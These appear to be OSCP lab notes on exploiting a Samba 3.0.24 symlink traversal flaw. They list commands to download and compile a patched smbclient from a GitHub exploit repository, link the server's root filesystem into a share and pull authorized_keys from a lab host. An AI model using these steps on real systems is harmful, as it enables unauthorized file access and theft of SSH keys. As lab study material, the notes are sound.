Symlink and Debian OpenSSL Predictable PRNG
Samba Exploit - Symlink for authorized_keys
# With samba 3.0.24 exploit - symlink, attacker can access to the directory outside the Samba root directory.
https://github.com/roughiz/Symlink-Directory-Traversal-smb-manually
# Kali
wget https://download.samba.org/pub/samba/stable/samba-3.4.5.tar.gz
tar xvfz samba-3.4.5.tar.gz
cd samba-3.4.5/source3/client/
mv client.c client.c.bak
wget https://raw.githubusercontent.com/roughiz/Symlink-Directory-Traversal-smb-manually/master/client.c
# Compile
cd samba-3.4.5/source3
./configure --prefix=/home/iptracej/oscp/lab/10.11.1.136
make && make install
# Configure and access to the share
export LD_LIBRARY_PATH="$LD_LIBRARY_PATH:/home/iptracej/oscp/lab/10.11.1.136/lib"
# access to the share and rootfs
cd bin
./smbclient \\\\10.11.1.136\\'Bob Share' -u bob -N --option='client min protocol=NT1'
symlink / rootfs
# Find authorized key
# Get the keys
mget authorized_keys
Debian OpenSSL Predictable PRNG
Last updated